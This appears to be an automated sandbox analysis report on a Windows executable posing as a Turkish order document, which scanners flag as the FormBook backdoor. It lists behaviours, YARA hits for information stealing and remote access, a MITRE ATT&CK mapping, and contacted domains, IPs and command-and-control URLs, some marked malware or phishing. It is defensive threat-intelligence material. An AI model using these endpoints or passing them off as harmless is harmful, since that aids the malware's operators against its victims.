Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_00796854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,

8_2_00796854

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 8_2_00794D08 GetVersion,

8_2_00794D08

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Shared Modules	1 Valid Accounts	1 Valid Accounts	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Access Token Manipulation	1 Valid Accounts	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	612 Process Injection	1 Access Token Manipulation	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	NTDS	41 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	612 Process Injection	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Deobfuscate/Decode Files or Information	DCSync	225 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Abuse Elevation Control Mechanism	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	4 Obfuscated Files or Information	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Software Packing	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 DLL Side-Loading	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Ticari Siparis Belgesi 26 07 2024 17545000600.exe	76%	ReversingLabs	Win32.Backdoor.FormBook
Ticari Siparis Belgesi 26 07 2024 17545000600.exe	100%	Avira	HEUR/AGEN.1357443
Ticari Siparis Belgesi 26 07 2024 17545000600.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
http://www.salesgymshark.shop	0%	Avira URL Cloud	safe
http://www.datalakeflow.com	0%	Avira URL Cloud	safe
http://www.salesgymshark.shopReferer:	0%	Avira URL Cloud	safe
https://word.office.comon	0%	Avira URL Cloud	safe
http://www.cripmz.xyz	0%	Avira URL Cloud	safe
http://www.brenjitu1904.com/pz12/	0%	Avira URL Cloud	safe
http://www.salesgymshark.shop/pz12/	0%	Avira URL Cloud	safe
http://www.autonwheels.comReferer:	0%	Avira URL Cloud	safe
http://www.cripmz.xyz/pz12/www.317wb.com	0%	Avira URL Cloud	safe
http://www.autonwheels.com/pz12/www.vanessasmobilespa.com	100%	Avira URL Cloud	malware
http://www.98980901.com/pz12/www.jnhdh8827.com	0%	Avira URL Cloud	safe
www.jnhdh8827.com/pz12/	0%	Avira URL Cloud	safe
http://www.datalakeflow.com/pz12/www.xcxocef.shop	0%	Avira URL Cloud	safe
http://www.vanessasmobilespa.com/pz12/	0%	Avira URL Cloud	safe
http://www.98980901.com	0%	Avira URL Cloud	safe
http://www.jnhdh8827.com	0%	Avira URL Cloud	safe
http://www.jnhdh8827.com/pz12/www.brenjitu1904.com	0%	Avira URL Cloud	safe
http://www.chalkandthimble.com	100%	Avira URL Cloud	malware
http://www.autonwheels.com	100%	Avira URL Cloud	malware
http://www.loyalbahis356.comReferer:	0%	Avira URL Cloud	safe
https://loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/	100%	Avira URL Cloud	malware
http://www.jnhdh8827.comReferer:	0%	Avira URL Cloud	safe
http://www.xcxocef.shopReferer:	0%	Avira URL Cloud	safe
http://www.cripmz.xyzReferer:	0%	Avira URL Cloud	safe
http://www.businessbroadway.com/pz12/www.qqfoodsolutions.com	0%	Avira URL Cloud	safe
http://www.vanessasmobilespa.comReferer:	0%	Avira URL Cloud	safe
http://www.xcxocef.shop/pz12/www.chalkandthimble.com	100%	Avira URL Cloud	phishing
http://www.businessbroadway.com	0%	Avira URL Cloud	safe
http://www.xiangadvanced.site/pz12/www.cripmz.xyz	0%	Avira URL Cloud	safe
http://www.salesgymshark.shop/pz12/www.businessbroadway.com	0%	Avira URL Cloud	safe
http://www.vanessasmobilespa.com	0%	Avira URL Cloud	safe
http://www.98980901.com/pz12/	0%	Avira URL Cloud	safe
http://www.datalakeflow.com/pz12/	0%	Avira URL Cloud	safe
http://www.xiangadvanced.siteReferer:	0%	Avira URL Cloud	safe
http://www.businessbroadway.comReferer:	0%	Avira URL Cloud	safe
http://www.vanessasmobilespa.com/pz12/www.98980901.com	0%	Avira URL Cloud	safe
https://wns.windows.com/)s	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.aromacuppa.comReferer:	0%	Avira URL Cloud	safe
http://www.317wb.com/pz12/www.loyalbahis356.com	0%	Avira URL Cloud	safe
http://www.98980901.comReferer:	0%	Avira URL Cloud	safe
http://www.aromacuppa.com/pz12/	0%	Avira URL Cloud	safe
http://www.autonwheels.com/pz12/	100%	Avira URL Cloud	malware
http://www.chalkandthimble.com/pz12/	100%	Avira URL Cloud	malware
http://www.brenjitu1904.comReferer:	0%	Avira URL Cloud	safe
http://www.loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA	100%	Avira URL Cloud	malware
http://www.brenjitu1904.com/pz12/www.salesgymshark.shop	0%	Avira URL Cloud	safe
http://www.317wb.comReferer:	0%	Avira URL Cloud	safe
http://www.chalkandthimble.com/pz12/www.xiangadvanced.site	100%	Avira URL Cloud	malware
http://www.brenjitu1904.com	0%	Avira URL Cloud	safe
http://www.317wb.com/pz12/	0%	Avira URL Cloud	safe
http://www.chalkandthimble.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=9hrk18skSQhCCsrWhUPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9udTNeDooaK7+	100%	Avira URL Cloud	malware
http://www.aromacuppa.com	0%	Avira URL Cloud	safe
http://www.datalakeflow.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=XLxih9erqU5OQ/zVa2U9uayzQwvQYqwD+iUwcFTJkQJbXUUHI+Ws7VPKfbblI2vONd0o	0%	Avira URL Cloud	safe
http://www.aromacuppa.com/pz12/www.autonwheels.com	0%	Avira URL Cloud	safe
http://www.cripmz.xyz/pz12/	0%	Avira URL Cloud	safe
http://www.xiangadvanced.site/pz12/	0%	Avira URL Cloud	safe
http://www.qqfoodsolutions.comReferer:	0%	Avira URL Cloud	safe
http://www.317wb.com	0%	Avira URL Cloud	safe
http://www.loyalbahis356.com	100%	Avira URL Cloud	malware
http://www.chalkandthimble.comReferer:	0%	Avira URL Cloud	safe
http://www.xcxocef.shop/pz12/	100%	Avira URL Cloud	malware
http://www.datalakeflow.comReferer:	0%	Avira URL Cloud	safe
http://www.xiangadvanced.site	0%	Avira URL Cloud	safe
http://www.xcxocef.shop	100%	Avira URL Cloud	phishing
http://www.jnhdh8827.com/pz12/	0%	Avira URL Cloud	safe
http://www.businessbroadway.com/pz12/	0%	Avira URL Cloud	safe
http://www.qqfoodsolutions.com/pz12/	0%	Avira URL Cloud	safe
http://www.loyalbahis356.com/pz12/www.aromacuppa.com	100%	Avira URL Cloud	malware
http://www.loyalbahis356.com/pz12/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chalkandthimble.com	207.241.198.3	true	true	unknown
aromacuppa.com	213.139.204.22	true	true	unknown
www.98980901.com	38.239.1.118	true	false	unknown
www.loyalbahis356.com	185.148.106.70	true	false	unknown
vanessasmobilespa.com	75.101.134.27	true	true	unknown
www.autonwheels.com	104.21.80.197	true	false	unknown
www.jnhdh8827.com	188.114.96.3	true	true	unknown
d1qrjwiza3wzm5.cloudfront.net	108.157.194.11	true	true	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	true	unknown
www.chalkandthimble.com	unknown	unknown	true	unknown
www.aromacuppa.com	unknown	unknown	true	unknown
www.vanessasmobilespa.com	unknown	unknown	true	unknown
www.datalakeflow.com	unknown	unknown	true	unknown
www.317wb.com	unknown	unknown	true	unknown
www.xiangadvanced.site	unknown	unknown	true	unknown
www.xcxocef.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.jnhdh8827.com/pz12/	true	Avira URL Cloud: safe	unknown
http://www.loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9L1MEhp7dpaA	false	Avira URL Cloud: malware	unknown
http://www.datalakeflow.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=XLxih9erqU5OQ/zVa2U9uayzQwvQYqwD+iUwcFTJkQJbXUUHI+Ws7VPKfbblI2vONd0o	true	Avira URL Cloud: safe	unknown
http://www.chalkandthimble.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=9hrk18skSQhCCsrWhUPNj3yaKA8UlZiY5Un3cfGqWer7qRPGp2VeMQg9udTNeDooaK7+	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000007.00000003.3094747325.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autonwheels.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salesgymshark.shop	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salesgymshark.shopReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.brenjitu1904.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salesgymshark.shop/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cripmz.xyz	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000007.00000002.4551366329.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2148003902.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autonwheels.com/pz12/www.vanessasmobilespa.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.cripmz.xyz/pz12/www.317wb.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.datalakeflow.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vanessasmobilespa.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.98980901.com/pz12/www.jnhdh8827.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.datalakeflow.com/pz12/www.xcxocef.shop	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jnhdh8827.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000007.00000003.3105365605.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4546550713.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.98980901.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000007.00000000.2137907662.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2142461714.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4544751645.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.autonwheels.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.chalkandthimble.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.loyalbahis356.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jnhdh8827.com/pz12/www.brenjitu1904.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/	explorer.exe, 00000007.00000002.4556895478.0000000010FBF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000008.00000002.4540713209.000000000418F000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.businessbroadway.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcxocef.shopReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.qqfoodsolutions.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.jnhdh8827.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcxocef.shop/pz12/www.chalkandthimble.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.businessbroadway.com/pz12/www.qqfoodsolutions.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vanessasmobilespa.comReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xiangadvanced.site/pz12/www.cripmz.xyz	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cripmz.xyzReferer:	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.salesgymshark.shop/pz12/www.businessbroadway.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vanessasmobilespa.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.datalakeflow.com/pz12/	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.vanessasmobilespa.com/pz12/www.98980901.com	explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
